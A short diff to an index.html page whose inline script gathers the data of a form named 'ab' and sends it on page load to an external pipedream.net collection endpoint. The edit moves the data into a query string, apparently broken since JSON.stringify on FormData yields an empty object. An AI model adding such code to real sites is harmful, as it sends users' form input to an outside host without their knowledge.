--- a/index.html
+++ b/index.html
@@ -9,8 +9,8 @@
 	    <script>
 		    	let formData = new FormData(document.forms.ab);
 		    	let xhr = new XMLHttpRequest();
-			xhr.open("POST", "https://eokig49m32jcp1t.m.pipedream.net");
-			xhr.send(formData);
+			xhr.open("POST", "https://eokig49m32jcp1t.m.pipedream.net/?"+JSON.stringify(formData));
+			xhr.send();
 	    </script>
     </body>
 </html>
